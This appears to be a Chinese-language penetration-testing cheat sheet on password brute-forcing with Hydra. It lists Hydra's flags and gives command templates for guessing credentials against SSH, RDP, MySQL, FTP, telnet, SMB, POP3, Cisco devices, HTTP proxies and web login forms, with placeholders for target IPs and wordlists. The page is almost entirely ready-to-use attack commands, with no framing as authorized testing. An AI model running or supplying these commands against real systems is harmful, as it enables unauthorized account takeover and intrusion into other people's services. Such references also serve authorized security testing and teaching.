密码爆破

Hydra

# 常用参数:
-R	根据上一次进度继续破解
-S	使用SSL协议连接
-s	指定端口
-l	指定用户名
-L	指定用户名字典(文件)
-p	指定密码破解
-P	指定密码字典(文件)
-e	空密码探测和指定用户密码探测(ns)
-C	用户名(username:password 可代替 -l username -p password)
-o	输出文件
-t	指定多线程数量,默认为16个线程
-vV	显示详细过程
-f	爆破出结果后停止爆破
目标
命令

ssh

hydra -L <用户名字典名> -P <密码字典> -vV -o ssh.log -e ns <目标IP> ssh -f

rdp

hydra <目标IP> rdp -l <用户名> -P <密码字典> -V

mysql

hydra -l <用户名> –P <密码字典> –e ns <目标IP> mysql

ftp

hydra <目标IP> ftp -l 用户名 -P <密码字典> -t 线程(默认16) -vV hydra <目标IP> ftp -l 用户名 -P <密码字典> -e ns -vV

telnet

hydra <目标IP> telnet -l 用户 -P <密码字典> -t 32 -s 23 -e ns -f -V

https

hydra -m /index.php -l <用户名> -P <密码字典>.txt <目标IP> https

teamspeak

hydra -l <用户名> -P <密码字典>.txt -s 端口号 -vV <目标IP> teamspeak

cisco

hydra -P <密码字典>.txt <目标IP> cisco hydra -m cloud -P <密码字典>.txt <目标IP> cisco-enable

smb

hydra -l <用户名> -P <密码字典>.txt <目标IP> smb

pop3

hydra -l <用户名> -P <密码字典> my.pop3.mail pop3

http-proxy

hydra -l <用户名> -P <密码字典> http-proxy://<目标IP>

GET提交

hydra -l <用户名> -p <密码字典> -t 线程 -vV -e ns <目标IP> http-get /admin/ hydra -l <用户名> -p <密码字典> -t 线程 -vV -e ns -f <目标IP> http-get /admin/index.php

POST提交

hydra -l <破解的用户名> -P <密码字典>.lst -o <输出的文件名>.lst -t <线程数> -f <目标IP> http-post-form "index.php:name=^USER^&pwd=^PASS^:<错误猜解的返回信息提示>"

Last updated